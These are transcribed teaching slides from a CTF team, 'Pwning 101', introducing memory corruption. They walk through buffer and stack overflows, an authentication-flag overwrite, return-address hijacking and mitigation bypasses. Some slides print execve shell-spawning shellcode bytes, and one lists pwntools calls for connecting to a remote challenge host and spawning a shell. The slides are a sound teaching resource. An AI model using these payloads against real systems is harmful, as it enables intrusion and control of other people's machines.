pwning 101 - p › projects › playground › slides › ...android roots, ios jailbreaks, gaming...
TRANSCRIPT
![Page 1: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/1.jpg)
PWNING 101 - p.1
spritzers - CTF team
spritz.math.unipd.it/spritzers.html
![Page 2: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/2.jpg)
All information presented here has the only purpose to teach how vulnerabilities work.
Use them to win CTFs and to build secure systems.
Do not hack your neighbor’s fancy IoT fridge.
Disclaimer
![Page 3: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/3.jpg)
Pwning in CTFsIn pwn challenges you have to exploit a remote service.
You typically want to get a shell and cat flag.
Most of the time, it’s a memory corruption vulnerability.
![Page 4: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/4.jpg)
Modifying a process’ memory in a way the programmer (or compiler) didn’t intend.
If we control the memory, we control the process.
What’s memory corruption?
![Page 5: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/5.jpg)
Memory corruption in the wild● Malware
○ Morris (1988!), CodeRed, Blaster, Sasser, Conficker, ...○ More recently, StuxNet and WannaCry
● Remote services and user applications○ Exposed to untrusted data
● Unlocking devices○ Android roots, iOS jailbreaks, gaming consoles (I started here!)
![Page 6: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/6.jpg)
Memory corruption vulnerabilities● Buffer overflows● Format strings● Use of uninitialized memory● Dangling pointers (e.g., use-after-free)● Type confusion● Heap metadata corruption
… and many more
![Page 7: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/7.jpg)
Memory corruption attacksTwo main subclasses:
● Non-Control-Data Attacks manipulate the application’s state and data
● Control-Flow Attacks manipulate the execution flow
![Page 8: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/8.jpg)
ExploitationFinding a vulnerability is just the first step.
Uncontrolled memory corruption typically results in a crash (e.g., SIGSEGV).
We need to channel the vulnerability into whatever we want to do.
![Page 9: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/9.jpg)
ExploitationFirst, we set things up for the upcoming corruption.
Then, we trigger it and watch the dominoes fall down.
The tool that performs this is an exploit.
![Page 10: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/10.jpg)
What’s memory?Memory is a flat sequence of bytes. That’s it.
Each byte is identified by an address.
Via memory protection, areas of memory can be marked as readable, writable, executable.
01 cd 4b 3f96 a1 39 bb22 33 cd e0
+0 +1 +2 +3+0+4+8
![Page 11: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/11.jpg)
Interpretations of memoryTypes do not exist in memory. They are just abstractions that define how a certain range of bytes is interpreted.
Example: integers (and pointers) are little-endian on x86.
78 56 34 12 <-> 0x12345678
Example: C arrays are a contiguous sequence of elements.
![Page 12: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/12.jpg)
A process’ memory
Stack
Heap
Main executable
Libraries
0x0000....text
.rodata
.got
.data
.bss
.plt
Code
Zero-init’ed data
Read/write data
Read-only data
Imports stuff
Imports stuff
![Page 13: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/13.jpg)
![Page 14: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/14.jpg)
Buffer overflowsSome languages (such as C/C++) do not check array bounds.
If the programmer doesn’t perform those checks, he might write data beyond the buffer’s boundaries.
This is bad. Like, really bad, man.
![Page 15: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/15.jpg)
Buffer overflows
79 6f 75 74 75 2e 62 65 2f 67 36 74 75 65 70 6d 55 6d 4a 67 00 00 00 00
...
...00 00 00 00 63 00 00 00 ca fe ba be 00 13 37 00 00 00 00 aa 00 bb 42 4200 00 00 00 00 00 00 0000 00 00 00 00 00 00 0000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00
Buffer
This program copies the user’s input to a fixed size 32-byte buffer.
![Page 16: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/16.jpg)
Buffer overflows
79 6f 75 74 75 2e 62 65 2f 67 36 74 75 65 70 6d 55 6d 4a 67 00 00 00 00
...
...00 00 00 00 63 00 00 00 ca fe ba be 00 13 37 00 00 00 00 aa 00 bb 42 4200 00 00 00 00 00 00 0000 00 00 00 00 00 00 0000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00
Buffer
79 6f 75 74 75 2e 62 65 2f 67 36 74 75 65 70 6d 55 6d 4a 67 00 00 00 00
...
...00 00 00 00 63 00 00 00 ca fe ba be 00 13 37 00 00 00 00 aa 00 bb 42 4241 41 41 41 41 41 41 4141 41 41 41 41 41 41 4141 41 41 41 00 00 00 0000 00 00 00 00 00 00 00
Input: 20 ‘A’
This program copies the user’s input to a fixed size 32-byte buffer.
![Page 17: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/17.jpg)
Buffer overflows
79 6f 75 74 75 2e 62 65 2f 67 36 74 75 65 70 6d 55 6d 4a 67 00 00 00 00
...
...00 00 00 00 63 00 00 00 ca fe ba be 00 13 37 00 00 00 00 aa 00 bb 42 4200 00 00 00 00 00 00 0000 00 00 00 00 00 00 0000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00
Buffer
41 41 41 41 41 41 41 41 2f 67 36 74 75 65 70 6d 55 6d 4a 67 00 00 00 00
...
...00 00 00 00 63 00 00 00 ca fe ba be 00 13 37 00 00 00 00 aa 00 bb 42 4241 41 41 41 41 41 41 4141 41 41 41 41 41 41 4141 41 41 41 41 41 41 4141 41 41 41 41 41 41 41
Input: 40 ‘A’
This program copies the user’s input to a fixed size 32-byte buffer.
![Page 18: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/18.jpg)
Buffer overflows
79 6f 75 74 75 2e 62 65 2f 67 36 74 75 65 70 6d 55 6d 4a 67 00 00 00 00
...
...00 00 00 00 63 00 00 00 ca fe ba be 00 13 37 00 00 00 00 aa 00 bb 42 4200 00 00 00 00 00 00 0000 00 00 00 00 00 00 0000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00
Buffer
41 41 41 41 41 41 41 41 2f 67 36 74 75 65 70 6d 55 6d 4a 67 00 00 00 00
...
...00 00 00 00 63 00 00 00 ca fe ba be 00 13 37 00 00 00 00 aa 00 bb 42 4241 41 41 41 41 41 41 4141 41 41 41 41 41 41 4141 41 41 41 41 41 41 4141 41 41 41 41 41 41 41
Input: 40 ‘A’
This program copies the user’s input to a fixed size 32-byte buffer.
Overflow
![Page 19: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/19.jpg)
Exercise platform
http://spritzctf.pythonanywhere.com/
![Page 20: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/20.jpg)
Exercise 1 - Auth OverflowInspired from Jon Erickson’s “Hacking: The Art of Exploitation”
int check_authentication() {int auth_flag = 0;char password_buffer[16];printf(“Enter password”);scanf(“%s”, password_buffer);/* password_buffer ok? => auth_flag = 1 */return auth_flag;
}
![Page 21: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/21.jpg)
Exercise 1 - Auth OverflowInspired from Jon Erickson’s “Hacking: The Art of Exploitation”
int check_authentication() {int auth_flag = 0;char password_buffer[16];printf(“Enter password”);scanf(“%s”, password_buffer);/* password_buffer ok? => auth_flag = 1 */return auth_flag;
}
![Page 22: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/22.jpg)
Exercise 1 - The overflow
?? ?? ?? ???? ?? ?? ???? ?? ?? ???? ?? ?? ??
00 00 00 00
Buffer
Flag = 0
?? ?? ?? ???? ?? ?? ???? ?? ?? ??
+0x00
+0x10
+0x1c
![Page 23: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/23.jpg)
Exercise 1 - The overflow
?? ?? ?? ???? ?? ?? ???? ?? ?? ???? ?? ?? ??
00 00 00 00
Buffer
Flag = 0
?? ?? ?? ???? ?? ?? ???? ?? ?? ??
+0x00
+0x10
+0x1c
Input: 29 ‘A’
41 41 41 4141 41 41 4141 41 41 4141 41 41 41
41 00 00 00
Buffer
Flag = 65
41 41 41 4141 41 41 4141 41 41 41
+0x00
+0x10
+0x1c
![Page 24: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/24.jpg)
Exercise 1 - The overflow
?? ?? ?? ???? ?? ?? ???? ?? ?? ???? ?? ?? ??
00 00 00 00
Buffer
Flag = 0
?? ?? ?? ???? ?? ?? ???? ?? ?? ??
+0x00
+0x10
+0x1c
Input: 29 ‘A’
41 41 41 4141 41 41 4141 41 41 4141 41 41 41
41 00 00 00
Buffer
Flag = 65
41 41 41 4141 41 41 4141 41 41 41
+0x00
+0x10
+0x1c
check_authentication will now return 65.
![Page 25: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/25.jpg)
Exercise 1 - The checkif (check_authentication())
/* access granted */
In C, anything != 0 is true.
The check will pass and grant us access. Profit!
Returns 65
![Page 26: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/26.jpg)
Pwntools installationInstall python and pip:
● [sudo] apt install python-pip● [sudo] dnf install python-pip● [sudo] pacman -S python2-pip
Install pwntools:
pip2 install --user pwntools
![Page 27: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/27.jpg)
Stack overflowsThe stack contains information that keeps track of the program’s control flow.
Overflowing a buffer located on the stack could allows us to hijack the flow to wherever we want.
Must read: Aleph One, Smashing the stack for fun and profit, Phrack (1996)
![Page 28: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/28.jpg)
The x86 stack
Return addressSaved BP
LocalsSP
BPFrame for
foo
void bar() {char baz[32];/* … */
}
void foo() {int abc, def;bar();
}
int main() {foo();
}
Lower addresses
Higher addresses
![Page 29: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/29.jpg)
The x86 stack
Return addressSaved BP
Locals
Return addressSP
BPFrame for
foo
void bar() {char baz[32];/* … */
}
void foo() {int abc, def;bar();
}
int main() {foo();
}
Lower addresses
Higher addresses
![Page 30: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/30.jpg)
The x86 stack
Return addressSaved BP
Locals
Return addressSaved BP
SP, BP
Frame forfoo
void bar() {char baz[32];/* … */
}
void foo() {int abc, def;bar();
}
int main() {foo();
}
Lower addresses
Higher addresses
![Page 31: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/31.jpg)
The x86 stack
Return addressSaved BP
Locals
Return addressSaved BP
LocalsSP
BP
Frame forfoo
Frame forbar
void bar() {char baz[32];/* … */
}
void foo() {int abc, def;bar();
}
int main() {foo();
}
Lower addresses
Higher addresses
![Page 32: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/32.jpg)
The x86 stack
Return addressSaved BP
Locals
Return addressSaved BP
SP, BP
Frame forfoo
void bar() {char baz[32];/* … */
}
void foo() {int abc, def;bar();
}
int main() {foo();
}
Lower addresses
Higher addresses
![Page 33: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/33.jpg)
The x86 stack
Return addressSaved BP
Locals
Return addressSP
BPFrame for
foo
void bar() {char baz[32];/* … */
}
void foo() {int abc, def;bar();
}
int main() {foo();
}
Lower addresses
Higher addresses
![Page 34: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/34.jpg)
The x86 stack
Return addressSaved BP
LocalsSP
BPFrame for
foo
void bar() {char baz[32];/* … */
}
void foo() {int abc, def;bar();
}
int main() {foo();
}
Lower addresses
Higher addresses
![Page 35: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/35.jpg)
Stack overflows
c3 90 8b 00 ff 7f 00 00
?? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ??
d5 e0 7b 30 b2 55 00 00
Buffer
RetaddrSv. BP
Returns to 0x55b2307be0d5
This program copies the user’s input to a fixed size 32-byte buffer.
![Page 36: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/36.jpg)
Stack overflows
c3 90 8b 00 ff 7f 00 00
?? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ??
d5 e0 7b 30 b2 55 00 00
Buffer
RetaddrSv. BP
Returns to 0x55b2307be0d5
Input: 32 ‘A’
c3 90 8b 00 ff 7f 00 00
41 41 41 41 41 41 41 4141 41 41 41 41 41 41 4141 41 41 41 41 41 41 4141 41 41 41 41 41 41 41
d5 e0 7b 30 b2 55 00 00
Returns to 0x55b2307be0d5
This program copies the user’s input to a fixed size 32-byte buffer.
![Page 37: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/37.jpg)
Stack overflows
c3 90 8b 00 ff 7f 00 00
?? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ??
d5 e0 7b 30 b2 55 00 00
Buffer
RetaddrSv. BP
Returns to 0x55b2307be0d5
Input: 40 ‘A’
41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 4141 41 41 41 41 41 41 4141 41 41 41 41 41 41 4141 41 41 41 41 41 41 41
d5 e0 7b 30 b2 55 00 00
Returns to 0x55b2307be0d5
This program copies the user’s input to a fixed size 32-byte buffer.
![Page 38: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/38.jpg)
Stack overflows
c3 90 8b 00 ff 7f 00 00
?? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ??
d5 e0 7b 30 b2 55 00 00
Buffer
RetaddrSv. BP
Returns to 0x55b2307be0d5
Input: 46 ‘A’
41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 4141 41 41 41 41 41 41 4141 41 41 41 41 41 41 4141 41 41 41 41 41 41 41
41 41 41 41 41 41 00 00
Returns to 0x414141414141
This program copies the user’s input to a fixed size 32-byte buffer.
IP control achieved!
![Page 39: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/39.jpg)
Exercise 2 - Remote ShellExploit plan:
?
![Page 40: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/40.jpg)
Exercise 2 - Remote ShellExploit plan:
1. Find the offset between buffer and retaddr2. Overwrite retaddr with spawn_shell3. Make main return4. ???5. Profit!
![Page 41: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/41.jpg)
ShellcodeSometimes there’s no “magic” function we can return to.
So let’s inject our own code into the process.
This code is called shellcode because it usually opens a shell.
![Page 42: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/42.jpg)
Shellcode
c0 90 8b 00 ff 7f 00 00
?? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ??
d5 e0 7b 30 b2 55 00 00
Buffer
RetaddrSv. BP
Returns to 0x55b2307be0d5
The program copies the user’s input to a fixed size 32-byte stack buffer.
0x7fff008b9070
![Page 43: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/43.jpg)
Shellcode
c0 90 8b 00 ff 7f 00 00
?? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ??
d5 e0 7b 30 b2 55 00 00
Buffer
RetaddrSv. BP
Returns to 0x55b2307be0d5
41 41 41 41 41 41 41 41
31 f6 48 bb 2f 62 69 6e2f 2f 73 68 56 53 54 5f6a 3b 58 31 d2 0f 05 4141 41 41 41 41 41 41 41
70 90 8b 00 ff 7f 00 00
The program copies the user’s input to a fixed size 32-byte stack buffer.
0x7fff008b9070 0x7fff008b9070
![Page 44: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/44.jpg)
Shellcode
c0 90 8b 00 ff 7f 00 00
?? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ??
d5 e0 7b 30 b2 55 00 00
Buffer
RetaddrSv. BP
Returns to 0x55b2307be0d5
41 41 41 41 41 41 41 41
31 f6 48 bb 2f 62 69 6e2f 2f 73 68 56 53 54 5f6a 3b 58 31 d2 0f 05 4141 41 41 41 41 41 41 41
70 90 8b 00 ff 7f 00 00
The program copies the user’s input to a fixed size 32-byte stack buffer.
0x7fff008b9070 0x7fff008b9070ShellcodePadding
Shellcodeaddress
![Page 45: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/45.jpg)
Shellcode
c0 90 8b 00 ff 7f 00 00
?? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ???? ?? ?? ?? ?? ?? ?? ??
d5 e0 7b 30 b2 55 00 00
Buffer
RetaddrSv. BP
Returns to 0x55b2307be0d5
41 41 41 41 41 41 41 41
31 f6 48 bb 2f 62 69 6e2f 2f 73 68 56 53 54 5f6a 3b 58 31 d2 0f 05 4141 41 41 41 41 41 41 41
70 90 8b 00 ff 7f 00 00
Returns to 0x7fff008b9070
The program copies the user’s input to a fixed size 32-byte stack buffer.
0x7fff008b9070 0x7fff008b9070ShellcodePadding
Shellcodeaddress
![Page 46: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/46.jpg)
Exercise 3 - Uselessbuffer @ bp-0x70String operations: ‘A’*6 + ‘BC’ == ‘AAAAAABC’String length: len(‘This is a string’)Numeric string to integer: int(‘12345’)Import pwntools: from pwn import *Configure pwntools: context(os=’linux’, arch=’x86_64’)Process: p = process(‘./useless’)Remote connection: p = remote(‘207.154.238.179’, 8193)Line I/O: p.recvline() / p.sendline(‘Hello!’)Interactive mode: p.interactive()Assemble shellcode: asm(shellcraft.sh())
![Page 47: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/47.jpg)
Mitigations● Stack Canaries
○ Secret value overwritten by overflow○ Bypass: infoleak, O(N) bruteforce (forkserver)
● Address Space Layout Randomization (ASLR)○ Can’t jump if I don’t know where the code is○ Bypass: infoleak, O(N) bruteforce (forkserver)
● Write XOR Execute (W⊕X, NX, DEP)○ Prevent code injection○ Bypass: code reuse (e.g., ROP)
![Page 48: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/48.jpg)
What did we learn?Always check your bounds!
As a general principle, if your application has a memory corruption vulnerability, most of the time a skilled and determined attacker will be able to exploit it.
![Page 49: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/49.jpg)
Stuff to check out● OverTheWire Vortex (http://overthewire.org/wargames/vortex/)● sploitF-U-N
(https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/)
![Page 50: PWNING 101 - p › projects › playground › slides › ...Android roots, iOS jailbreaks, gaming consoles (I started here!) Memory corruption vulnerabilities Buffer overflows Format](https://reader033.vdocuments.mx/reader033/viewer/2022042322/5f0c5daf7e708231d4350b30/html5/thumbnails/50.jpg)
?